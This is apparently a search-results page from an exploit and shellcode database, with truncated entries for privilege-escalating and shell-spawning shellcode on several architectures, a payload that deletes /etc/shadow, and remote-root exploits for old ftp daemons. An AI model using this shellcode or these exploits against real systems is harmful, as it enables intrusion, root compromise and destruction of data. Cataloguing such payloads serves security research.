1131 matches found
Linux - setreuid (0,0) & execve(/bin/rm /etc/shadow)
No description provided by source. / rmtheshadow.c by mrme Just for fun : visit: http://www.corelan.be:8800/ / include stdio.h include string.h char sc = x31xc0 // xor %eax,%eax xb0x46 // mov $046,%al x31xdb // xor %ebx,%ebx x31xc9 // xor %ecx,%ecx xcdx80 // int $080 x31xc0 // xor %eax,%eax x50 /...
Linux/x86_64 execve("/bin/sh"); 30 bytes shellcode
No description provided by source. Linux/x8664 execve/bin/sh; 30 bytes shellcode Date: 2010-04-26 Author: zbt Tested on: x8664 Debian GNU/Linux / ; execve/bin/sh, /bin/sh, NULL section .text global start start: xor rdx, rdx mov qword rbx, '//bin/sh' shr rbx, 0x8 push rbx mov rdi, rsp push rax pus...
FreeBSD 2.2-4.2,NetBSD 1.2-4.5,OpenBSD 2.x ftpd glob() Buffer Overflow
No description provided by source. source: http://www.securityfocus.com/bid/2548/info The BSD ftp daemon and derivatives such as IRIX ftpd or the ftp daemon shipped with Kerberos 5 contain a number of buffer overflows that may lead to a compromise of root access to malicious users. During parsing...
freebsd/x86 setuid(0); execve(ipf -Fa); shellcode 57 bytes
No description provided by source. ; sm4x - 2008 ; setuid0; execve//sbin/ipf, //sbin/ipf, -Faa, 0, 0; ; 57 bytes ; FreeBSD 7.0-RELEASE global start start: main: ; --------------------- setuid 0 xor eax, eax xor ecx, ecx push eax push eax mov al, 0x17 int 0x80 ; --------------------- -Faa xor eax,...
Linux kernel <= 2.2.18 ptrace/execve Race Condition Vulnerability (1)
No description provided by source. source: http://www.securityfocus.com/bid/2529/info The Linux kernel is the core of all distributions of the Linux Operating System. It was originally written by Linus Torvalds, and is maintained by a community of developers. A problem in the Linux Kernel could...
Linux/ARM - execve("/bin/sh", [0], [0 vars]) - 27 bytes
No description provided by source. / Title: Linux/ARM - execve/bin/sh, 0, 0 vars - 27 bytes Date: 2010-08-31 Tested on: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan - twitter: @jonathansalwan shell-storm.org Shellcode ARM with not a 0x20, 0x0a and 0x00 Disassembly of section .text: 00008054 start...
Linux/x86 Multi-Egghunter
No description provided by source. / Title: Multi-Egghunter Author: Ryan Fenno @ryanfenno Date: 20 September 2013 Tested on: Linux/x86 Ubuntu 12.0.3 Description: This entry represents an extension of skape's sigaction2 egghunting method 1 to multiple eggs. It is similar in spirit to BJ 'SkyLined'...
wu-ftpd <= 2.6.1 - Remote Root Exploit
No description provided by source. / 7350wurm - x86/linux wuftpd remote root exploit TESO CONFIDENTIAL - SOURCE MATERIALS This is unpublished proprietary source code of TESO Security. The contents of these coded instructions, statements and computer programs may not be disclosed to third parties,...
os-x/PPC/x86 execve("/bin/sh",{"/bin/sh",NULL},NULL) 121 bytes
No description provided by source. / - dual.c - by [email protected] execve/bin/sh,/bin/sh,NULL,NULL shellcode for osx both the ppc and x86 version. Sample output: -nemo@squee:/shellcode$ file dual-ppc dual-ppc: Mach-O executable ppc -nemo@squee:/shellcode$ ./dual-ppc sh-2.05b$ exit...
linux/x86 setuid(0) & execve(/bin/sh,0,0) shellcode 28 bytes
No description provided by source. -------------------ASM---------------------- global start section .text start: ;setuid0 xor ebx,ebx lea eax,ebx+17h cdq int 80h ;execve/bin/sh,0,0 xor ecx,ecx push ecx push 0x68732f6e push 0x69622f2f lea eax,ecx+0Bh mov ebx,esp int 80h...
Linux/ARM - Polymorphic execve("/bin/sh", ["/bin/sh"], NULL); - XOR 88 encoded - 78 bytes
No description provided by source. / Title: Linux/ARM - Polymorphic execve/bin/sh, /bin/sh, NULL; - XOR 88 encoded - 78 bytes Date: 2010-06-28 Tested on: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan Web: http://shell-storm.org | http://twitter.com/jonathansalwan ! Database of shellcodes...
linux chroot()/execve() code
No description provided by source. / This is Linux chroot/execve code.It is 80 bytes long.I have some ideas how to make it smaller, but till then use this one. signed predator linux registered user : 181116 preedatoratsendmaildotru / char...
linux/x86 execve(/bin/dash) 42 bytes
No description provided by source. / linux/x86 execve/bin/dash 42 bytes Author : X-h4ck [email protected], [email protected] www.pirate.al , www.flashcrew.in Greetz : mywisdom - Danzel - Wulns - IllyrianWarrior- Ace - M4yh3m - Saldeath ev1lut1on - Lekosta - Pretorian - bi0 - Slimshaddy - d3trimentaL ...
52 byte Linux MIPS execve
No description provided by source. include stdio.h / entropy at phiral.net 52 byte linux mips shellcode oh werd [email protected] /encode/1/2 cat s.s .section .text .globl start .set noreorder start: li $a2, 0x666 p: bltzal $a2, p slti $a2, $zero, -1 addu $sp, $sp, -32 addu $a0, $ra, 4097 addu...
GNU Sharutils <= 4.2.1 - Local Format String PoC Exploit
No description provided by source. / GNU sharutils = 4.2.1 Local Format String POC Code C0ded by n4rk0tix a.k.a nrktx [email protected] Below is a l4m3 proof of concept code for da recently reported lame bug; These binaryz have not only format bugz, but also buffer overflowz,etc.We also...
Linux x86 - polymorphic execve("/bin/bash","-p",NULL) - 57 bytes
No description provided by source. / Title: Linux x86 - polymorphic execve/bin/bash, /bin/bash, -p, NULL - 57 bytes Author: Jonathan Salwan Mail: [email protected] Web: http://www.shell-storm.org !Database of Shellcodes http://www.shell-storm.org/shellcode/ sh sets euid, egid to uid, gid if ...
Linux/ARM - execve("/bin/sh","/bin/sh",0) - 30 bytes
No description provided by source. / Title: Linux/ARM - execve/bin/sh,/bin/sh,0 - 30 bytes Date: 2010-06-28 Tested: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan Web: http://shell-storm.org | http://twitter.com/jonathansalwan ! Dtabase of shellcodes http://www.shell-storm.org/shellcode/ 8054:...
Linux x86 - execve("/bin/bash","-p",NULL) - 33 bytes
No description provided by source. / Title: Linux x86 - execve/bin/bash, /bin/bash, -p, NULL - 33 bytes Author: Jonathan Salwan Mail: [email protected] Web: http://www.shell-storm.org !Database of Shellcodes http://www.shell-storm.org/shellcode/ sh sets euid, egid to uid, gid if -p not...
os-x/ppc execve(/bin/sh), exit() 72 bytes
No description provided by source. / MacOSX/PowerPC Shellcode for: execve/bin/sh, /bin/sh, NULL, exit 72 bytes hophet at gmail.com http://www.nlabs.com.br/hophet/ / include stdio.h include string.h char shellcode = \x7c\xa5\x2a\x79 \x40\x82\xff\xfd \x7d\x68\x02\xa6 \x3b\xeb\x01\x71 \x39\x40\x01\x...
Serial port shell binding, busybox Launching shellcode
No description provided by source. / General: Serial port shell binding, busybox launching shellcode.. yey! Specific: really wish i could tell you what i needed this for.. but meh.. this will bind a busybox sh shell to /dev/ttyS0, the shellcode does not alter the baudrate settings.. 9600 is the...